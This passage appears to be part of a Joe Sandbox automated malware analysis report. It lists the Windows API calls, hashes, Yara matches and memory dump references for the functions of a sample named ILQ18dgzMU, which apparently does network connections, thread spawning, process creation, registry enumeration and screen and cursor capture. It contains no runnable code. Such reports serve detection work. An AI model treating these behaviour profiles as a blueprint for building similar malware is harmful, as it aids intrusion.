                        Similarity
                        • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                        • String ID:
                        • API String ID: 3718465862-0
                        • Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                        • Instruction ID: 21dd105a5168550a9b540fcdb24a84def9abfbab51ce737ed9a3fc356bbae124
                        • Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                        • Instruction Fuzzy Hash: 1A11C8711043596BF710DF70CC8AFDB7799EB88700F004929FB4596191EFB4A94987A2
                        Function 10006A80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117sleepprocessthreadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10006A00: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006A13
                          • Part of subcall function 10006A00: sprintf.MSVCRT ref: 10006A5E
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006BCA
                          • Part of subcall function 100042E0: GetTickCount.KERNEL32 ref: 100042E1
                          • Part of subcall function 100042E0: rand.MSVCRT ref: 100042E9
                        • sprintf.MSVCRT ref: 10006B7C
                          • Part of subcall function 100069C0: GetInputState.USER32 ref: 100069C3
                          • Part of subcall function 100069C0: GetCurrentThreadId.KERNEL32 ref: 100069CF
                          • Part of subcall function 100069C0: PostThreadMessageA.USER32(00000000), ref: 100069D6
                          • Part of subcall function 100069C0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006BA6
                        • Sleep.KERNEL32(000001F4), ref: 10006BAD
                        • TerminateProcess.KERNEL32(?,00000000), ref: 10006BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$MessageProcesssprintf$CountCreateCurrentDirectoryExitInputPostSleepStateSystemTerminateTickUserrand
                        • String ID: "%s" "%s?abc=%d%d%d%d"$D
                        • API String ID: 2273885519-298079244
                        • Opcode ID: 3dd078da72f4aa0b4ac7f4d0abae9dcae982cb418f0f43f4f6240b8f213a96c0
                        • Instruction ID: e2e422187bf7f62d4a7dfdcb849eb519d2ebad81eaa5718c6418f72dd91d73fb
                        • Opcode Fuzzy Hash: 3dd078da72f4aa0b4ac7f4d0abae9dcae982cb418f0f43f4f6240b8f213a96c0
                        • Instruction Fuzzy Hash: 7B31FBB26043816FF710DB54DC41BF7B7E9EBC9744F100828F38597291DAB169498B67
                        Function 10006020 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 10006027
                        • gethostbyname.WS2_32(?), ref: 10006033
                        • inet_ntoa.WS2_32(?), ref: 1000605D
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100060CB
                        • CloseHandle.KERNEL32(00000000), ref: 100060CE
                        • CreateThread.KERNEL32(00000000,00000000,Function_00005A50,00000000,00000000,00000000), ref: 1000610A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: 61f6dbe606caf10acae022083e96ee646558a2b8ef7fa7bd45154beb274bc8b0
                        • Instruction ID: 0c267aa21d92a451f69d0d77f992422e5ea3e4874e035255eb318ff1417f8f24
                        • Opcode Fuzzy Hash: 61f6dbe606caf10acae022083e96ee646558a2b8ef7fa7bd45154beb274bc8b0
                        • Instruction Fuzzy Hash: CA21B1367406145BE328DA399C45B2B77E3EBC4760F658229FA56EB3D0DAF4EC008615
                        Function 100068C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 100068C7
                        • gethostbyname.WS2_32(?), ref: 100068D3
                        • inet_ntoa.WS2_32(?), ref: 100068FD
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000696B
                        • CloseHandle.KERNEL32(00000000), ref: 1000696E
                        • CreateThread.KERNEL32(00000000,00000000,100065E0,00000000,00000000,00000000), ref: 100069AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: cc180864d079bcb22b0f7a7c6c0a3a19f8df3a68816e3ac905fa64844ec056cd
                        • Instruction ID: c63b20073011ef97e4020128f9f2a7fe8d530fad7bc28e92a0ece3fc0a9ef4fa
                        • Opcode Fuzzy Hash: cc180864d079bcb22b0f7a7c6c0a3a19f8df3a68816e3ac905fa64844ec056cd
                        • Instruction Fuzzy Hash: 4321E4367006141BE328DB399C55B1B77E7EBC8760F658229FA16D73D4CAF4DC008614
                        Function 100064E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 100064E7
                        • gethostbyname.WS2_32(?), ref: 100064F3
                        • inet_ntoa.WS2_32(?), ref: 1000651D
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000658B
                        • CloseHandle.KERNEL32(00000000), ref: 1000658E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00006120,00000000,00000000,00000000), ref: 100065CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: 46e3885d6f86e91add6559d647d4374089d72116cef43151df6f347bbe1fe172
                        • Instruction ID: 3a1490d0b82bde18bf422f003273374030d414e8c9d695ddb901e40ecb9a8b09
                        • Opcode Fuzzy Hash: 46e3885d6f86e91add6559d647d4374089d72116cef43151df6f347bbe1fe172
                        • Instruction Fuzzy Hash: 2121E1367006155BE328DA389C55B2A76E3EBC8760F658229FA16EB3D4CAF4EC008604
                        Function 10019030 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10019066
                        • ??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 1001909A
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 100190C1
                        • CoInitialize.OLE32(00000000), ref: 100190CB
                        • CreateWindowExA.USER32(00000000,#32770,1007DEB0,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100190ED
                        • ShowWindow.USER32(00000000,00000000), ref: 100190F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@CreateWindow$EventInitializeShow
                        • String ID: #32770
                        • API String ID: 1167904864-463685578
                        • Opcode ID: 5f2cad0891328baacf2038ae1ba62bc6255f5a226d74e92da70e93358474a15a
                        • Instruction ID: fbc591a8bcf6fa824284178b701e6ac3dffbed0453eb3d377a51b14afdd182d1
                        • Opcode Fuzzy Hash: 5f2cad0891328baacf2038ae1ba62bc6255f5a226d74e92da70e93358474a15a
                        • Instruction Fuzzy Hash: E1212DB4901750DFD320DF2A8984A56FBE8FB09700F808A2EE19AC7B10D378E9448F55
                        Function 100100F0 Relevance: 12.2, APIs: 8, Instructions: 169sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 100106B0: ReleaseDC.USER32(?,?), ref: 100106CA
                          • Part of subcall function 100106B0: GetDesktopWindow.USER32 ref: 100106D0
                          • Part of subcall function 100106B0: GetDC.USER32(00000000), ref: 100106DD
                        • GetCursorPos.USER32(?), ref: 1001012A
                        • GetCursorInfo.USER32(?), ref: 1001014B
                        • DestroyCursor.USER32(?), ref: 10010174
                        • GetTickCount.KERNEL32 ref: 10010268
                        • Sleep.KERNEL32(00000001), ref: 1001027D
                        • GetTickCount.KERNEL32 ref: 1001027F
                        • GetTickCount.KERNEL32 ref: 1001028C
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10010290
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                        • String ID:
                        • API String ID: 3294368536-0
                        • Opcode ID: 2f744981113fd58bd3e3d8a05f90d98a79edce13fd048475b8a5ffd6ae8b9cfa
                        • Instruction ID: e9fd782cb1bcb9b1701e4f8e74acacb221c63e795abc428d7567abd2cf743c69
                        • Opcode Fuzzy Hash: 2f744981113fd58bd3e3d8a05f90d98a79edce13fd048475b8a5ffd6ae8b9cfa
                        • Instruction Fuzzy Hash: C5517B757007409FD724CF28CC84A6AB3E6FBC8350B148A1DF5C68B652DBB4F9858BA1
                        Function 1000E1E0 Relevance: 12.2, APIs: 8, Instructions: 153registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
                        • LocalAlloc.KERNEL32(00000040,?), ref: 1000E26B
                        • ??2@YAPAXI@Z.MSVCRT(?), ref: 1000E2A8
                        • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E2FD
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E342
                        • RegCloseKey.ADVAPI32(?), ref: 1000E34F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
                        • String ID:
                        • API String ID: 71355648-0
                        • Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                        • Instruction ID: 0d29100cb4f4234f2f0a58eafd3dd667aa445c0341ebf796ba77ca07b141115c
                        • Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                        • Instruction Fuzzy Hash: 2F41BF71604355AFE314CF28C884A6BBBEAFBC8750F448A2DFA49D7240D675DD05CBA2
                        Function 004038F7 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403912
                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403926
                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403952
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401DA5), ref: 0040398A
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401DA5), ref: 004039AC
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401DA5), ref: 004039C5
                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 004039D8
                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A16
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: ce19379b5c801f893dc2334789dfcac98eef8e2995b344cad91d556853cb3c64
                        • Instruction ID: ff30bfc8f9be561c5475340de208a15b64567a7b1e9e55a202f3809b281a0d3a
                        • Opcode Fuzzy Hash: ce19379b5c801f893dc2334789dfcac98eef8e2995b344cad91d556853cb3c64
                        • Instruction Fuzzy Hash: 723126F2A042546FD720BF795C8483BBE9CE64530A712053BF582F3280E5798E41466D
                        Function 100051C0 Relevance: 12.1, APIs: 8, Instructions: 63networksleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 100051D0
                        • htons.WS2_32 ref: 100051F7
                        • inet_addr.WS2_32(1007DDAC), ref: 10005207
                        • socket.WS2_32(00000002,00000001,00000000), ref: 10005236
                        • connect.WS2_32(00000000,?,00000010), ref: 10005242
                        • Sleep.KERNEL32(00000028), ref: 10005246
                        • closesocket.WS2_32(00000000), ref: 10005249
                        • RtlExitUserThread.NTDLL(00000000), ref: 1000525E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
                        • String ID:
                        • API String ID: 3058909470-0
                        • Opcode ID: 660e3d67af9de24333e36b20ce4359f9289523299145d539b21777f83b2d2bbc
                        • Instruction ID: 94ef63c873733004aa79e9f3c422adbccbd854d57dbd48bd6174a3db466a2c42
                        • Opcode Fuzzy Hash: 660e3d67af9de24333e36b20ce4359f9289523299145d539b21777f83b2d2bbc
                        • Instruction Fuzzy Hash: E31170711043A0ABF300AF65CC89B6ABBB9FF89741F00841EF69497291DBB59C448B26
                        Function 10003D80 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                        • String ID:
                        • API String ID: 1486965892-0
                        • Opcode ID: 2ef8863390499d5b5c96e316d1b9f118d70ca8aab9b9aa03753ca9dae948b5b4
                        • Instruction ID: d673aae80c479508691cbba635995b5dbf00140be29d5f3562972adf305b2b32
                        • Opcode Fuzzy Hash: 2ef8863390499d5b5c96e316d1b9f118d70ca8aab9b9aa03753ca9dae948b5b4
                        • Instruction Fuzzy Hash: EE51C479A00145ABDB05DF68C891BEFB7BDEF84680F00C42DF509AB345DB35A90587E1
                        Function 10004830 Relevance: 10.6, APIs: 7, Instructions: 98threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • GetVersionExA.KERNEL32 ref: 10004846
                        • inet_addr.WS2_32(?), ref: 10004871
                        • gethostbyname.WS2_32(?), ref: 1000487D
                        • inet_ntoa.WS2_32(?), ref: 100048A7
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000491B
                        • CloseHandle.KERNEL32(00000000), ref: 1000491E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004520,00000000,00000000,00000000), ref: 1000494A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 3347725681-0
                        • Opcode ID: b6942b7a69f52a0167a8efb4442df1a2c78cd9b6a5f3ae8746464ba8319e2b3c
                        • Instruction ID: 3f7545d14604e368064a9ea0dd8a33a2503e85d3dbdce8005e2a4cef5e3f6ea5
                        • Opcode Fuzzy Hash: b6942b7a69f52a0167a8efb4442df1a2c78cd9b6a5f3ae8746464ba8319e2b3c
                        • Instruction Fuzzy Hash: 593104762007405BF328DB349C85B2B77E2EBC4760F62862DF956972D0CEB89C44C719
                        Function 10008960 Relevance: 10.6, APIs: 7, Instructions: 96stringfilememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 100089AC
                        • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 100089CB
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100089D4
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 100089DB
                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 100089E9
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 10008A17
                        • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 10008A3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                        • String ID:
                        • API String ID: 2793549963-0
                        • Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                        • Instruction ID: 722694e748314f2fe196516ce33186b52bae3b30c103117b11a3d139f94a5a93
                        • Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                        • Instruction Fuzzy Hash: 9721B1727003146FE708DA78EC95A6BB6DAEBC8721F44453DFA06C73C0DAF5AD098661
                        Function 10005850 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005858
                        • gethostbyname.WS2_32(?), ref: 10005864
                        • inet_ntoa.WS2_32(?), ref: 1000588E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100058FC
                        • CloseHandle.KERNEL32(00000000), ref: 100058FF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10005928
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F90,00000000,00000000,00000000), ref: 1000593B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: d6b4a468b4273d7649f20adfbb0b48c854a58062e02beaf39faacaff6750e6db
                        • Instruction ID: da17f7c1703191c294c07bb024cf35e15be85521bc9bfbe2903f345ac267b1a4
                        • Opcode Fuzzy Hash: d6b4a468b4273d7649f20adfbb0b48c854a58062e02beaf39faacaff6750e6db
                        • Instruction Fuzzy Hash: CF21B4727403556BF328DB349C45B1B77E6EBC4B60F258629FA52AB2D0CEF4AC048718
                        Function 10005950 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005958
                        • gethostbyname.WS2_32(?), ref: 10005964
                        • inet_ntoa.WS2_32(?), ref: 1000598E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100059FC
                        • CloseHandle.KERNEL32(00000000), ref: 100059FF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10005A28
